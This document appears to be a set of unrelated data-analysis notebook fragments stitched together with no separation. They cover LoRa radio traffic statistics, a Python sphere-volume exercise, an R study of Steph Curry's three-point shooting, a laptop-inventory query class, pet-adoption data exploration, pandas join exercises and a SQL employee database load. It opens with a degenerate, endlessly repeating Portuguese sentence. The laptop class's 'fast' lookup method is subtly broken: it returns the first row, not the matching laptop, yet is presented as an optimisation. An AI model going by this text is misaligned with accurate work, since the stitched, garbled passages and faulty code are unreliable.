O que Praticar exercícios todos os dias melhora o que se refere a sua vida. O que é Praticar exercícios todos os dias melhora o que se refere a sua vida. O que é o Praticar exercícios todos os dias melhora o que se refere a sua vida. O que é o que Praticar exercícios todos os dias melhora o que se refere a sua vida. O que é o que é Praticar exercícios todos os dias melhora o que se refere a sua vida. O que é o que é o Praticar exercíc[...]LoRa Data Analysis - Sample project We first declare a fixed parameters.Thos parameters are not changed during the experiments.Fixed communication parameters are listed below:- Code Rate: 4/5- Frequency: 866.1 MHz- Bandwidth: 125 kHz Initial declaration%matplotlib inline import pandas as pd # import pandas import numpy as np # import numpy import matplotlib.pyplot as plt # import plotting module import statistics from IPython.display import set_matplotlib_formats # module for svg export set_matplotlib_formats('svg') # set export to svg file cut_ratio = 0.05 # Values below 5% of mean value are simply cut from charts to make it more readableAnalysis of uplink messages We read a csv file with uplink messagesuplink_data = pd.read_csv('uplink_messages.csv', delimiter=',')Let us have a look at various columns that are present and can be evaluated.uplink_data.head()Remove all columns that have fixed values or there is no point in their analysis.try: del uplink_data['id'] del uplink_data['msg_group_number'] del uplink_data['is_primary'] del uplink_data['message_type_id'] del uplink_data['coderate'] del uplink_data['bandwidth'] del uplink_data['receive_time'] except KeyError: print('Columns have already been removed')Let us have a look for different values to get an overview of overall values of different network parameters.uplink_data.describe()Create a new column 'arm'. 
This column represents a combination of SF (spreading factor) and TP (transmission power) and is referred to in multi-armed bandit terminology as an arm.
uplink_data['arm'] = 'S' + uplink_data.spf.astype(str) + 'P' + uplink_data.power.astype(str)
Communication parameters selection
arms = uplink_data.arm.value_counts() threshold = statistics.mean(uplink_data.arm.value_counts()) * cut_ratio print(f'Values below {threshold} will be cut in a plot') arms = arms[arms > threshold] arms # set_matplotlib_formats('svg') hist = arms.plot(kind='bar',rot=0) hist.set_xlabel("Bandit Arm",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)
Export plot to SVG.
fig = hist.get_figure() fig.savefig('adr-bandit-arms.svg')
Duty cycle values
uplink_data.duty_cycle_remaining.describe()
Spreading Factor
hist = uplink_data.spf.value_counts().plot(kind='bar',rot=0) hist.set_xlabel("SF",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)
Frequency band utilization
We first convert the frequency values from Hz to MHz.
uplink_frequency = uplink_data.frequency / 1000000 hist = uplink_frequency.value_counts().plot(kind='bar',rot=0) hist.set_xlabel("Frequency [MHz]",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)
Utilization of different LoRa Access Points
hist = uplink_data.ap_id.value_counts().plot(kind='bar',rot=0) hist.set_xlabel('Access Point',fontsize=12) hist.set_ylabel('Number of Messages',fontsize=12)
Duration of Data Transmission
hist = uplink_data.airtime.value_counts().plot(kind="bar",rot=0) hist.set_xlabel("Time over Air [ms]",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)
Transmission Power
hist = uplink_data.power.value_counts().plot(kind="bar",rot=0) hist.set_xlabel("Transmission Power [dBm]",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)
Analysis of End Nodes
uplink_data.node_id.describe() unique_ens = len(uplink_data.node_id.unique()) unique_aps = len(uplink_data.ap_id.unique()) print(f"Total number of connected end devices: {unique_ens}") print(f"Total number of connected access points: {unique_aps}")
Total number of connected end devices: 232 Total number of connected access points: 4
Downlink Messages
downlink_data = pd.read_csv('downlink_messages.csv', delimiter=',') downlink_data.head()
Utilization of LoRa Access Points
hist = downlink_data.ap_id.value_counts().plot(kind='bar',rot=0) hist.set_xlabel("Access Points",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)
Duty cycle correction
downlink_data.duty_cycle_remaining.describe()
Spreading Factor
hist = downlink_data.spf.value_counts().plot(kind='bar',rot=0) hist.set_xlabel("Spreading Factor",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)
Frequencies
downlink_frequency = downlink_data.frequency / 1000000 hist = downlink_frequency.value_counts().plot(kind='bar',rot=0) hist.set_xlabel("Frequency [MHz]",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)
Transmission Power
hist = downlink_data.power.value_counts().plot(kind="bar",rot=0) hist.set_xlabel("Transmission Power [dBm]",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)
Time over Air
hist = downlink_data.airtime.value_counts().plot(kind="bar",rot=0) hist.set_xlabel("Time over Air [ms]",fontsize=12) hist.set_ylabel("Number of Messages",fontsize=12)
End Nodes
Analysis of certain aspects (active time, sleep time and collisions) of end devices.
end_nodes = pd.read_csv('end_nodes_50.csv', delimiter=',') end_nodes.head()
Collision histogram
hist = end_nodes.collisions.value_counts().plot(kind='bar',rot=0) hist.set_xlabel("Number of Collisions",fontsize=12) hist.set_ylabel("Number of 
Messages",fontsize=12)Ration between active time and total nodes uptimeenergy = end_nodes.active_time / end_nodes.uptime energy.describe()**Note**: Click on "*Kernel*" > "*Restart Kernel and Run All*" in [JupyterLab](https://jupyterlab.readthedocs.io/en/stable/) *after* finishing the exercises to ensure that your solution runs top to bottom *without* any errors. If you cannot run this file on your machine, you may want to open it [in the cloud ](https://mybinder.org/v2/gh/webartifex/intro-to-data-science/main?urlpath=lab/tree/00_python_in_a_nutshell/06_exercises_volume.ipynb). Chapter 0: Python in a Nutshell (Coding Exercises) The exercises below assume that you have read the preceeding content sections.The `...`'s in the code cells indicate where you need to fill in code snippets. The number of `...`'s within a code cell give you a rough idea of how many lines of code are needed to solve the task. You should not need to create any additional code cells for your final solution. However, you may want to use temporary code cells to try out some ideas. Volume of a Sphere The [volume of a sphere ](https://en.wikipedia.org/wiki/Sphere) is defined as $\frac{4}{3} * \pi * r^3$.In **Q2**, you will write a `function` implementing this formula, and in **Q3** and **Q5**, you will execute this `function` with a couple of example inputs.**Q1**: First, execute the next two code cells that import the `math` module from the [standard library ](https://docs.python.org/3/library/index.html) providing an approximation for $\pi$!import math math.pi**Q2**: Implement the business logic in the `sphere_volume()` function below according to the specifications in the **docstring**!Hints:- `sphere_volume()` takes a mandatory `radius` input and an optional `ndigits` input (defaulting to `5`)- Because `math.pi` is constant, it may be used within `sphere_volume()` *without* being an official input- The volume is returned as a so-called `float`ing-point number due to the rounding with the built-in [round() ](https://docs.python.org/3/library/functions.htmlround) function- You may either write your solution as one big expression (where the `...` are) or introduce an intermediate step holding the result before rounding (then, one more line of code is needed above the `return ...` one)def sphere_volume(radius, ndigits=5): """Calculate the volume of a sphere. Args: radius (int or float): radius of the sphere ndigits (optional, int): number of digits when rounding the resulting volume Returns: volume (float) """ return ...**Q3**: Execute the function with `radius = 100.0` and 1, 5, 10, 15, and 20 as `ndigits` respectively.radius = 100.0 sphere_volume(...) sphere_volume(...) sphere_volume(...) sphere_volume(...) sphere_volume(...)**Q4**: What observation do you make? **Q4**: Using the [range() ](https://docs.python.org/3/library/functions.htmlfunc-range) built-in, write a `for`-loop and calculate the volume of a sphere with `radius = 42.0` for all `ndigits` from `1` through `20`!Hint: You need to use the built-in [print() ](https://docs.python.org/3/library/functions.htmlprint) function to make the return values visibleradius = 42.0 for ... in ...: ...**Q5**: What lesson do you learn about `float`ing-point numbers? With the [round() ](https://docs.python.org/3/library/functions.htmlround) function, we can see another technicality of the `float`ing-point standard: `float`s are *inherently* imprecise!**Q6**: Execute the following code cells to see a "weird" output! 
What could be the reasoning behind rounding this way?round(1.5) round(2.5) round(3.5) round(4.5)IntroductionI'm a big basketball fan. Lucky for me, basketball has recently under gone a statistical explosion into the "analytics era". New, novel, advanced stats are collected by even the most common websites such as Basketball Reference and NBA's own stats site.That being said, the methods for accessing the data may not be the easiest or most straightforward. The data I needed to create this was sourced in this way:https://www.reddit.com/r/sportsbook/comments/59hsno/best_website_to_pull_nba_statistics_into_excel/.With the data sourced, this brief analysis focused on probably the greatest shooter of all time, . His shot is nothing short of impeccable and shoots at mind-boggling rates he has changed the current game of basketball. With that in mind, I wanted to find out who defends him the most, who does the best job, and who does Steph roast from beyond the arc. As always, first we load the necessary libraries. There will be warnings and such due to tidyverse's masking of other functions:library(readr) library(tidyverse)Registered S3 methods overwritten by 'ggplot2': method from [.quosures rlang c.quosures rlang print.quosures rlang Registered S3 method overwritten by 'rvest': method from read_xml.response xml2 -- Attaching packages --------------------------------------- tidyverse 1.2.1 -- v ggplot2 3.1.1 v purrr 0.3.2 v tibble 2.1.1 v dplyr 0.8.0.1 v tidyr 0.8.3 v stringr 1.4.0 v ggplot2 3.1.1 v forcats 0.4.0 -- Conflicts ------------------------------------------ tidyverse_conflicts() -- x dplyr::filter() masks stats::filter() x dplyr::lag() masks stats::lag()Now we import the data into the environment:#raw csv import source <- read_csv("C:/Users/NTellaku/Documents/R/Stery Infographic/leagueseasonmatchups.csv") #data labels labels <- source %>% select(resultSets__headers) %>% slice(1:34) #data values source_info <- source %>% select(resultSets__rowSet) head(source)Parsed with column specification: cols( resource = col_character(), parameters__LeagueID = col_character(), parameters__Season = col_character(), parameters__SeasonType = col_character(), parameters__PORound = col_double(), parameters__PerMode = col_character(), parameters__Outcome = col_character(), parameters__DateFrom = col_character(), parameters__DateTo = col_character(), parameters__DefTeamID = col_character(), parameters__OffTeamID = col_character(), parameters__OffPlayerID = col_double(), parameters__DefPlayerID = col_character(), resultSets__name = col_character(), resultSets__headers = col_character(), resultSets__rowSet = col_character() )The resulting output doesn't look to make too much sense. The way the JSON converts the data into a .csv is the reason why. A deeper look shows that most of the data is empty and every piece of info that's needed is within the last two columns: resultSets__headers and resultSets__rowSet. labels contains the column resultSets__headers which looks to be all the row names. source_info contains the column resultSets__rowSet which seems to contain the actual usable data.As this is a one-column csv from a JSON, we now have to actually wrangle the data set:#initializing empty matrix source_split <- as_tibble(matrix(, nrow = 34, ncol = 350))We create an empty matrix. 
Now we need to take all the information in resultSets__headers and resultSets__rowSet and put it into the matrix so we have a usable Data Frame:#loop to go through the rows and add each data point to the matrix i <- 1 value <- i + 33 j <- 1 while (value <= 11900) { source_split[, j] <- source_info %>% slice(i:value) i <- i + 34 value <- i + 33 j <- j + 1 } #transposing and converting the matrix into a tidyverse data frame analysis <- as_tibble(t(source_split)) colnames(analysis) <- t(labels) head(analysis)From the JSON, we were able to extract a Tibble listing 's performance against the other teams he played against and various statistics such as fouls, 3-point percentage, etc. With this, we want to make our analytical data set that contains the information we need and new variables we may need to create.analysis2 <- analysis %>% mutate(name_poss = paste(analysis$DEF_PLAYER_NAME, " (", analysis$POSS, ")", sep = "")) %>% slice(1:26) %>% select(name_poss, POSS, FG3M, FG3A, FG3_PCT) %>% transform(POSS = as.numeric(POSS), FG3M = as.numeric(FG3M), FG3A = as.numeric(FG3A), FG3_PCT = as.numeric(FG3_PCT)) #Analysis dataset complete head(analysis2)We now have what we need. The players who defended , the number of possessions, the number of threes he made and attempted, and the corresponding percentage. The slice function can be less manual, but the intention was to have players who guarded Steph a minimum of 40 total possessions through the season. I'll leave slice for now, but the ultimate goal of the code can be better replaced with filter(POSS >= 40).With the analytical data set complete, we create the visual to check out Steph's performance against his primary defenders:analysis2 %>% ggplot(aes(x = reorder(name_poss, +FG3_PCT), y = FG3_PCT, size = FG3A, fill = FG3_PCT)) + geom_point(alpha = 0.75, shape = 21, color = "black") + coord_flip() + labs(size = "3-Point Field\nGoals Attempted", title = "Steph Curry's 3-Point Field Goal Percentage when Guarded by:", subtitle = "Among players that guarded Steph at least 40 possessions in 2018-2019 Regular Season", y = "3-Point Field Goal Percentage", x = "Player Name (Possessions)") + scale_y_continuous(limits = c(0.1, 0.9), breaks = seq(0.1, 0.9, 0.1)) + scale_size_continuous(range = c(1, 10)) + theme(legend.position = c(0.15, 0.85), panel.border = element_rect(colour = "black", fill = NA), plot.background = element_rect(fill = "floralwhite"), panel.background = element_rect(fill = "white"), panel.grid.major = element_line(size = 0.5, linetype = "solid", colour = "#ececec"), panel.grid.minor = element_line(size = 0.5, linetype = "solid", colour = "#ececec"), legend.key = element_rect(colour = "transparent", fill = "transparent"), legend.background = element_blank(), legend.box.background = element_rect(colour = "black"), plot.title = element_text(face = "bold", size = 11, hjust = 0.5), plot.subtitle = element_text(face = "italic", size = 9, hjust = 0.5)) + geom_hline(yintercept = 0.423, linetype = 2, color = "gray55") + annotate(geom = "label", x = 3, y = .49, label = "Season Average\n42.3%", fontface = "bold") + scale_fill_gradient2(low = ("#0571b0"), mid = "white", high = ("#ca0020"), midpoint = 0.423, guide = FALSE)Building Fast Queries on a CSVSkills: Object Oriented Programming, Time and Space Complexity AnalysisWe will imagine that we own an online laptop store and want to build a way to answer a few different business questions about our inventory.# Open and explore the dataset import csv with open('laptops.csv') as file: read_file = 
csv.reader(file) laptop_prices = list(read_file) header = laptop_prices[0] rows = laptop_prices[1:] print(header) print(rows) # Create a class with the csv filename as input to read the file class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) new_class = Inventory('laptops.csv') print(new_class.header) print(len(new_class.rows)) # Improve the class to get laptop given laptop id as input class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) def get_laptop_from_id(self, laptop_id): for row in self.rows: if row[0] == laptop_id: return row return None new_class = Inventory('laptops.csv') print(new_class.get_laptop_from_id('3362737')) print(new_class.get_laptop_from_id('3362736')) # To reduce time complexity of this algorithm, we will use preprocessing the data to create dict # where the keys are the IDs and the values are the rows. class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) self.id_to_row = {} for row in self.rows: self.id_to_row[row[0]] = row def get_laptop_from_id(self, laptop_id): for row in self.rows: if row[0] == laptop_id: return row return None def get_laptop_from_id_fast(self, laptop_id): for row in self.rows: if laptop_id in self.id_to_row: return row else: return None new_class = Inventory('laptops.csv') print(new_class.get_laptop_from_id_fast('3362737')) print(new_class.get_laptop_from_id_fast('3362736')) # Let's compare the performance of those two methods class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) self.id_to_row = {} for row in self.rows: self.id_to_row[row[0]] = row def get_laptop_from_id(self, laptop_id): for row in self.rows: if row[0] == laptop_id: return row return None def get_laptop_from_id_fast(self, laptop_id): for row in self.rows: if laptop_id in self.id_to_row: return row else: return None import time import random ids = [str(random.randint(1000000,9999999)) for _ in range(10000)] new_class = Inventory('laptops.csv') total_time_no_dict = 0 for each in ids: start = time.time() new_class.get_laptop_from_id(each) end = time.time() total_time_no_dict += (end-start) total_time_dict = 0 for each in ids: start = time.time() new_class.get_laptop_from_id_fast(each) end = time.time() total_time_dict += (end-start) print(total_time_no_dict, total_time_dict) # Let's implement preprocessing of data to make our code of check_promotion_dollars() run faster. 
class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) self.id_to_row = {} self.prices = set() for row in self.rows: self.id_to_row[row[0]] = row self.prices.add(row[-1]) def get_laptop_from_id(self, laptop_id): for row in self.rows: if row[0] == laptop_id: return row return None def get_laptop_from_id_fast(self, laptop_id): for row in self.rows: if laptop_id in self.id_to_row: return row else: return None def check_promotion_dollars(self, dollars): for row in self.rows: if row[-1] == dollars: return True for i in self.rows: for j in self.rows: if i[-1] + j[-1] == dollars: return True return False def check_promotion_dollars_fast(self, dollars): if dollars in self.prices: return True for i in self.prices: for j in self.prices: if i + j == dollars: return True return False new_class = Inventory('laptops.csv') print(new_class.check_promotion_dollars_fast(1000)) print(new_class.check_promotion_dollars_fast(442)) # Let's compare the performance of the last two functions that we wrote class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) self.id_to_row = {} self.prices = set() for row in self.rows: self.id_to_row[row[0]] = row self.prices.add(row[-1]) def get_laptop_from_id(self, laptop_id): for row in self.rows: if row[0] == laptop_id: return row return None def get_laptop_from_id_fast(self, laptop_id): for row in self.rows: if laptop_id in self.id_to_row: return row else: return None def check_promotion_dollars(self, dollars): for row in self.rows: if row[-1] == dollars: return True for i in self.rows: for j in self.rows: if i[-1] + j[-1] == dollars: return True return False def check_promotion_dollars_fast(self, dollars): if dollars in self.prices: return True for i in self.prices: for j in self.prices: if i + j == dollars: return True return False import random import time prices = [random.randint(100,5000) for _ in range(100)] new_class = Inventory('laptops.csv') total_time_no_set = 0 for price in prices: start = time.time() new_class.check_promotion_dollars(price) end = time.time() total_time_no_set += (end-start) total_time_set = 0 for price in prices: start = time.time() new_class.check_promotion_dollars_fast(price) end = time.time() total_time_set += (end-start) print(total_time_no_set, total_time_set) # We want to write a method that efficiently answers the query: Given a budget of D dollars, find all laptops # whose price it at most D. 
class Inventory(): def __init__(self, csv_filename): with open(csv_filename) as file: list_file = list(csv.reader(file)) self.header = list_file[0] self.rows = list_file[1:] for row in self.rows: row[-1] = int(row[-1]) self.id_to_row = {} self.prices = set() for row in self.rows: self.id_to_row[row[0]] = row self.prices.add(row[-1]) def row_price(row): return row[-1] self.rows_by_price = sorted(self.rows, key=row_price) def get_laptop_from_id(self, laptop_id): for row in self.rows: if row[0] == laptop_id: return row return None def get_laptop_from_id_fast(self, laptop_id): for row in self.rows: if laptop_id in self.id_to_row: return row else: return None def check_promotion_dollars(self, dollars): for row in self.rows: if row[-1] == dollars: return True for i in self.rows: for j in self.rows: if i[-1] + j[-1] == dollars: return True return False def check_promotion_dollars_fast(self, dollars): if dollars in self.prices: return True for i in self.prices: for j in self.prices: if i + j == dollars: return True return False def find_first_laptop_more_expensive(self, price): range_start = 0 range_end = len(self.rows_by_price) - 1 while range_start < range_end: range_middle = (range_end + range_start) // 2 lap_price = self.rows_by_price[range_middle][-1] if lap_price == price: return range_middle + 1 elif lap_price < price: range_start = range_middle + 1 else: range_end = range_middle - 1 lap_price = self.rows_by_price[range_start][-1] if lap_price < price: return -1 return range_start+1 new_class = Inventory('laptops.csv') print(new_class.find_first_laptop_more_expensive(1000)) print(new_class.find_first_laptop_more_expensive(10000))683 -1Visualization- Let's have a look have a look at which states have the most pets.groupbyState = train[["State", "Type"]].groupby(["State"]).count().reset_index() total_df = pd.merge(left=groupbyState, right=state_labels, how='left', left_on='State', right_on='StateID') data = total_df[["Type", "StateName"]].rename(index=str, columns={ "Type": "Total" }) sns.set(style="whitegrid") ax = sns.barplot(x="StateName", y="Total", data=data.sort_values(by=['Total'], ascending=False)) for item in ax.get_xticklabels(): item.set_rotation(45)This is in accordance with the size of the state, in terms of number of inhabitants.ax = sns.scatterplot(x="AdoptionSpeed", y="Fee", hue="Type", data=train)Deep-dive into a specific exampleTo further understand the data, let's have a look at all the data we have for a single pet.pet = train.sample(1) print("Here are the details for %s: \n\n %s \n" % (pet.iloc[0]["Name"], pet.iloc[0]["Description"])) pet.THere are the details for nan: Those cats are very healthy. Age 3 months old but look big. The owner kept them after the mother cat left. They are very cudly, active and toilet trained.Besides the information, available in the `train.csv` file, we also have access to the pictures, the "metadata" and the "sentiment". Let's have a look at the first 2 pictures in this example.pet_id = pet.iloc[0]["PetID"] print("Say hello to %s ! 😃 \n(PetID %s)" % (pet.iloc[0]["Name"], pet_id)) # With this PetID, we can open the images `-1.jpg` in the '..in/train/train_images' folder TRAIN_IMAGES_FOLDER = os.path.join(IN_FOLDER, "train", "train_images") train_images_path = os.listdir(TRAIN_IMAGES_FOLDER) pet_images = list(filter(lambda p: pet_id in p, train_images_path)) Image(os.path.join(TRAIN_IMAGES_FOLDER, pet_images[0]))Say hello to nan ! 😃 (PetID 98f0a2ac7)We also have access to the "sentiment". 
So let's open this file !TRAIN_SENTIMENT_FOLDER = os.path.join(IN_FOLDER, "train", "train_sentiment") sentiment = os.path.join(TRAIN_SENTIMENT_FOLDER, pet_id + ".json") with open(sentiment) as f: data = json.load(f) pprint(data){'categories': [], 'documentSentiment': {'magnitude': 0.6, 'score': 0.1}, 'entities': [{'mentions': [{'text': {'beginOffset': -1, 'content': 'cats'}, 'type': 'COMMON'}], 'metadata': {}, 'name': 'cats', 'salience': 0.7279305, 'type': 'OTHER'}, {'mentions': [{'text': {'beginOffset': -1, 'content': 'mother cat'}, 'type': 'COMMON'}], 'metadata': {}, 'name': '', 'salience': 0.1109983, 'type': 'OTHER'}, {'mentions': [{'text': {'beginOffset': -1, 'content': 'owner'}, 'type': 'COMMON'}], 'metadata': {}, 'name': 'owner', 'salience': 0.104588285, 'type': 'PERSON'}, {'mentions': [{'text': {'beginOffset': -1, 'content': 'toilet'}, [...]It seems that the sentiment file is a sentiment analysis previously performed on the description given to the pet.Let's find a submission with a high score, and one with a low score, to find out what makes a good and a bad description.worst_score = data["documentSentiment"]["score"] best_score = data["documentSentiment"]["score"] for json_path in os.listdir(TRAIN_SENTIMENT_FOLDER): path = os.path.join(TRAIN_SENTIMENT_FOLDER, json_path) with open(path) as f: data = json.load(f) score = data["documentSentiment"]["score"] if score > best_score: best_score = score best_score_pet_id = json_path[:-5] elif score < worst_score: worst_score = score worst_score_pet_id = json_path[:-5] best_description = train.loc[train["PetID"] == best_score_pet_id]["Description"].item() worst_description = train.loc[train["PetID"] == worst_score_pet_id]["Description"].item() print("The best score is %f for the description:\n\t%s\n" % (best_score, best_description)) print("The worst score is %f for the description:\n\t%s" % (worst_score, worst_description))The best score is 0.900000 for the description: This is Fernando.He very Charming & friendly.He can be a good friend.. The worst score is -0.900000 for the description: -he is one of Momi kittens which is my cat -he looks like wearing a jacket wit mask -very spoiled and playful -toilet trained -i have to let him go bcause my acc condition is not stable just give me a call, text or email -afiqSteps of a semi-joinIn the last video, you were shown how to perform a semi-join with `pandas`. In this exercise, you'll solidify your understanding of the necessary steps. Recall that a semi-join filters the left table to only the rows where a match exists in both the left and right tables.Instructions- Sort the steps in the correct order of the technique shown to perform a semi-join in `pandas`. Step 1:Merge the left and right tables on key column using an inner-join.Step 2:Search if the key column in the left table is in the merged tables using the `.isin()` method creating a Boolean `Series`.Step 3:Subset the rows of the left table. Performing an anti-joinIn our music streaming company dataset, each customer is assigned an employee representative to assist them. In this exercise, filter the employee table by a table of top customers, returning only those employees who are **not** assigned to a customer. The results should resemble the results of an anti-join. 
The company's leadership will assign these employees additional training so that they can work with high valued customers.The `top_cust` and `employees` tables have been provided for you.Instructions- Merge `employees` and `top_cust` with a left join, setting `indicator` argument to `True`. Save the result to `empl_cust`.- Select the `srid` column of `empl_cust` and the rows where `_merge` is `'left_only'`. Save the result to `srid_list`.- Subset the `employees` table and select those rows where the `srid` is in the variable `srid_list` and print the results.# Import the DataFrames employees = pd.read_csv('employees.csv') top_cust = pd.read_csv('top_cust.csv') # Merge employees and top_cust empl_cust = employees.merge(top_cust, on='srid', how='left', indicator=True) # Select the srid column where _merge is left_only srid_list = empl_cust.loc[empl_cust['_merge'] == 'left_only', 'srid'] # Get employees not working with top customers employees[employees['srid'].isin(srid_list)]Performing a semi-joinSome of the tracks that have generated the most significant amount of revenue are from TV-shows or are other non-musical audio. You have been given a table of invoices that include top revenue-generating items. Additionally, you have a table of non-musical tracks from the streaming service. In this exercise, you'll use a semi-join to find the top revenue-generating non-musical tracks..The tables `non_mus_tcks`, `top_invoices`, and `genres` have been loaded for you.Instructions- Merge `non_mus_tcks` and `top_invoices` on `tid` using an inner join. Save the result as `tracks_invoices`.- Use `.isin()` to subset the rows of `non_mus_tck` where `tid` is in the `tid` column of `tracks_invoices`. Save the result as `top_tracks`.- Group `top_tracks` by `gid` and count the `tid` rows. Save the result to `cnt_by_gid`.- Merge `cnt_by_gid` with the `genres` table on `gid` and print the result.# Import the DataFrames non_mus_tcks = pd.read_csv('non_mus_tcks.csv') top_invoices = pd.read_csv('top_invoices.csv') genres = pd.read_csv('genres.csv') # Merge the non_mus_tck and top_invoices tables on tid tracks_invoices = non_mus_tcks.merge(top_invoices, on='tid') # Use .isin() to subset non_mus_tcsk to rows with tid in tracks_invoices top_tracks = non_mus_tcks[non_mus_tcks['tid'].isin(tracks_invoices['tid'])] # Group the top_tracks by gid and count the tid rows cnt_by_gid = top_tracks.groupby(['gid'], as_index=False).agg({'tid':'count'}) # Merge the genres table to cnt_by_gid on gid and print print(cnt_by_gid.merge(genres, on='gid'))gid tid name 0 19 4 TV Shows 1 21 2 Drama 2 22 1 ComedyConcatenation basicsYou have been given a few tables of data with musical track info for different albums from the metal band, Metallica. The track info comes from their Ride The Lightning, Master Of Puppets, and St. Anger albums. 
Try various features of the `.concat()` method by concatenating the tables vertically together in different ways.The tables `tracks_master`, `tracks_ride`, and `tracks_st` have loaded for you.Instructions- Concatenate `tracks_master`, `tracks_ride`, and `tracks_st`, in that order, setting `sort` to `True`.- Concatenate `tracks_master`, `tracks_ride`, and `tracks_st`, where the index goes from 0 to n-1.- Concatenate `tracks_master`, `tracks_ride`, and `tracks_st`, showing only columns that are in all tables.# Import the DataFrames tracks_master = pd.read_csv('tracks_master.csv') tracks_ride = pd.read_csv('tracks_ride.csv') tracks_st = pd.read_csv('tracks_st.csv') # Concatenate the tracks tracks_from_albums = pd.concat([tracks_master, tracks_ride, tracks_st], sort=True) tracks_from_albums # Concatenate the tracks so the index goes from 0 to n-1 tracks_from_albums = pd.concat([tracks_master, tracks_ride, tracks_st], ignore_index=True, sort=True) tracks_from_albums # Concatenate the tracks, show only columns names that are in all tables tracks_from_albums = pd.concat([tracks_master, tracks_ride, tracks_st], join='inner', sort=True) tracks_from_albumsConcatenating with keysThe leadership of the music streaming company has come to you and asked you for assistance in analyzing sales for a recent business quarter. They would like to know which month in the quarter saw the highest average invoice total. You have been given three tables with invoice data named `inv_jul`, `inv_aug`, and `inv_sep`. Concatenate these tables into one to create a graph of the average monthly invoice total.Instructions- Concatenate the three tables together vertically in order with the oldest month first, adding `'7Jul'`, `'8Aug'`, and `'9Sep'` as `keys` for their respective months, and save to variable `avg_inv_by_month`.- Use the `.agg()` method to find the average of the `total` column from the grouped invoices.- Create a bar chart of `avg_inv_by_month`.# Import the DataFrames inv_jul = pd.read_csv('inv_jul.csv') inv_aug = pd.read_csv('inv_aug.csv') inv_sep = pd.read_csv('inv_sep.csv') # Concatenate the tables and add keys inv_jul_thr_sep = pd.concat([inv_jul, inv_aug, inv_sep], keys=['7Jul','8Aug','9Sep']) # Group the invoices by the index keys and find avg of the total column avg_inv_by_month = inv_jul_thr_sep.groupby(level=0).agg({'total':'mean'}) # Bar plot of avg_inv_by_month avg_inv_by_month.plot(kind='bar') plt.show()Using the append methodThe `.concat()` method is excellent when you need a lot of control over how concatenation is performed. However, if you do not need as much control, then the `.append()` method is another option. You'll try this method out by appending the track lists together from different Metallica albums. 
From there, you will merge it with the `invoice_items` table to determine which track sold the most.The tables `tracks_master`, `tracks_ride`, `tracks_st`, and `invoice_items` have loaded for you.Instructions- Use the `.append()` method to combine (**in this order**) `tracks_ride`, `tracks_master`, and `tracks_st` together vertically, and save to `metallica_tracks`.- Merge `metallica_tracks` and `invoice_items` on `tid` with an inner join, and save to `tracks_invoices`.- For each `tid` and `name` in `tracks_invoices`, sum the quantity sold column, and save as `tracks_sold`.- Sort `tracks_sold` in descending order by the `quantity` column, and print the table.# Import the DataFrames invoice_items = pd.read_csv('invoice_items.csv') # Use the .append() method to combine the tracks tables metallica_tracks = tracks_ride.append([tracks_master, tracks_st], sort=False) # Merge metallica_tracks and invoice_items tracks_invoices = metallica_tracks.merge(invoice_items, on='tid') # For each tid and name sum the quantity sold tracks_sold = tracks_invoices.groupby(['tid','name']).agg({'quantity':'sum'}) # Sort in decending order by quantity and print the results tracks_sold.sort_values(['quantity'], ascending=False)Validating a mergeYou have been given 2 tables, `artists`, and `albums`. Use the console to merge them using `artists.merge(albums, on='artid').head()`. Adjust the `validate` argument to answer which statement is **False**. You can use `'many_to_one'` without an error, since there is a duplicate key in the left table. Concatenate and merge to find common songsThe senior leadership of the streaming service is requesting your help again. You are given the historical files for a popular playlist in the classical music genre in 2018 and 2019. Additionally, you are given a similar set of files for the most popular pop music genre playlist on the streaming service in 2018 and 2019. Your goal is to concatenate the respective files to make a large classical playlist table and overall popular music table. 
Then filter the classical music table using a semi-join to return only the most popular classical music tracks.The tables `classic_18`, `classic_19`, and `pop_18`, `pop_19` have been loaded for you.Instructions- Concatenate the `classic_18` and `classic_19` tables vertically where the index goes from 0 to n-1, and save to `classic_18_19`.- Concatenate the `pop_18` and `pop_19` tables vertically where the index goes from 0 to n-1, and save to `pop_18_19`.# Import the DataFrames classic_18 = pd.read_csv('classic_18.csv') classic_19 = pd.read_csv('classic_19.csv') pop_18 = pd.read_csv('pop_18.csv') pop_19 = pd.read_csv('pop_19.csv') # Concatenate the classic tables vertically classic_18_19 = pd.concat([classic_18, classic_19], ignore_index=True) # Concatenate the pop tables vertically pop_18_19 = pd.concat([pop_18, pop_19], ignore_index=True) # Merge classic_18_19 with pop_18_19 classic_pop = classic_18_19.merge(pop_18_19, on='tid') # Using .isin(), filter classic_18_19 rows where tid is in classic_pop popular_classic = classic_18_19[classic_18_19['tid'].isin(classic_pop['tid'])] # Print popular chart popular_classicImport Dependenciesimport matplotlib.pyplot as plt import pandas as pd from sqlalchemy import create_engine import psycopg2 engine = create_engine(f'postgresql://{user}:{passw}@127.0.0.1/Employees_db') connection = engine.connect()Download the Dataemployees = pd.read_sql('SELECT * FROM employees', connection, parse_dates = ['birth_date', 'hire_date']) employees titles = pd.read_sql('SELECT * FROM titles', connection) titles salaries = pd.read_sql('SELECT * FROM salaries', connection) salaries departments = pd.read_sql('SELECT * FROM departments', connection) departments 